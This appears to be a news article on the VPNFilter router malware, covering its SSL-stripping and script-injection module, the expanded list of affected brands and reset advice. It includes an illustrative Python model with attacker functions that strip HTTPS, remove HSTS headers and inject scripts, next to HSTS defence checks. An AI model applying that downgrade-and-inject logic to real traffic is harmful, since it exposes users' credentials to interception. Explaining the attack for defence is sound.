We already knew that the malware, which is said to originate in Russia, can collect data, infect other devices, steal credentials, and even destroy a device by overwriting a critical portion of its firmware. Cisco Talos has now discovered a new stage 3 module that downgrades HTTPS connections to plaintext HTTP (an SSL-stripping attack): it intercepts outgoing web requests passing through the router and rewrites them so that the victim's browser never establishes an encrypted session, leaving credentials and other sensitive data readable to the attacker.
Because it sits on the path between the victim and the web server, the same module can also act as a man-in-the-middle and inject malicious content, such as JavaScript, into the now-unencrypted web traffic. Another newly discovered capability is the malware's ability to attack other devices behind the router, including PCs on the same local network.
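To make the downgrade-and-inject technique concrete, here is a small Python model of what an on-path proxy on a compromised router can do to plaintext web traffic, together with the client-side defence (an HSTS cache) and a simple check for links that have been downgraded. This is an illustrative example written for this article, not the malware's own code; the host names, headers and HTML are constructed samples.

```python
"""Model of HTTPS downgrade (SSL stripping) plus content injection, and the
HSTS logic that defeats it. Illustrative only; all data below is constructed."""
import re
from urllib.parse import urlsplit, urlunsplit

# Constructed sample traffic as an on-path proxy would see it on port 80.
SAMPLE_REQUEST_HEADERS = {
    "Host": "bank.example",
    "Accept-Encoding": "gzip, deflate",
    "Upgrade-Insecure-Requests": "1",
}
SAMPLE_RESPONSE_HEADERS = {
    "Content-Type": "text/html",
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
}
SAMPLE_HTML = (
    "<html><body>"
    '<a href="https://bank.example/login">Sign in</a>'
    '<form action="https://bank.example/auth" method="post">'
    '<input name="password" type="password"></form>'
    "</body></html>"
)


# --- attacker side: rewriting traffic that is already unencrypted -----------

def downgrade_request(headers):
    """Ask the server for an uncompressed reply the proxy can edit in place,
    and drop the browser's hint that it would accept an HTTPS redirect."""
    out = dict(headers)
    out["Accept-Encoding"] = "identity"
    out.pop("Upgrade-Insecure-Requests", None)
    return out


def strip_https(html):
    """Turn every https:// reference into http:// so the next click or form
    submission leaves the browser in plaintext."""
    return html.replace("https://", "http://")


def inject_script(html, script_url):
    """Insert an attacker-controlled <script> tag before </body>."""
    tag = '<script src="%s"></script>' % script_url
    if "</body>" in html:
        return html.replace("</body>", tag + "</body>", 1)
    return html + tag


def strip_hsts(headers):
    """Remove Strict-Transport-Security so a first-time visitor never learns
    to insist on HTTPS for this host."""
    return {k: v for k, v in headers.items()
            if k.lower() != "strict-transport-security"}


def tamper(request_headers, response_headers, html, script_url):
    """The complete on-path rewrite of one request/response pair."""
    return (downgrade_request(request_headers),
            strip_hsts(response_headers),
            inject_script(strip_https(html), script_url))


# --- defender side: a browser-style HSTS cache ------------------------------

def learn_hsts(cache, host, response_headers):
    """Remember hosts that sent a positive max-age. Returns True if recorded.
    Expiry is ignored here for brevity (assumption of this example)."""
    value = response_headers.get("Strict-Transport-Security")
    if value is None:
        return False
    m = re.search(r"max-age=(\d+)", value)
    if m and int(m.group(1)) > 0:
        cache.add(host)
        return True
    return False


def enforce_hsts(cache, url):
    """Upgrade http:// to https:// for any host in the cache, so a stripped
    link never reaches the wire in cleartext."""
    parts = urlsplit(url)
    if parts.scheme == "http" and parts.hostname in cache:
        return urlunsplit(("https",) + tuple(parts[1:]))
    return url


def find_stripped_links(cache, html):
    """Plain-http links to hosts known to require HTTPS: a sign of tampering."""
    return [url for url in re.findall(r'(?:href|action)="(http://[^"]+)"', html)
            if urlsplit(url).hostname in cache]
```

The defender-side functions show why the downgrade only works against a browser that has not yet learned the site's HSTS policy (or against a site that does not send one); HSTS preload lists close that first-visit gap. A router that can rewrite port-80 traffic cannot touch a connection the browser opened directly over TLS, which is why the attack must intercept the initial plaintext request.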
It appears that more routers are affected than previously thought, too. A handful of devices from Linksys, MikroTik, Netgear, QNAP, and TP-Link were originally said to be the only ones vulnerable, but it seems more models from these brands, along with routers from Asus, D-Link, Huawei, Ubiquiti, Upvel and ZTE, are also at risk. You can see the full list at the bottom of this page.
While VPNFilter is mostly targeting routers in Ukraine, suggesting a political motivation, it's strongly recommended that all owners of the affected routers update their firmware and perform a factory reset. A simple reboot is not enough: it clears the stage 2 and stage 3 modules, but the stage 1 component survives a reboot and can re-download them, so a reset to factory defaults followed by a firmware update and a new administrator password is the safe course.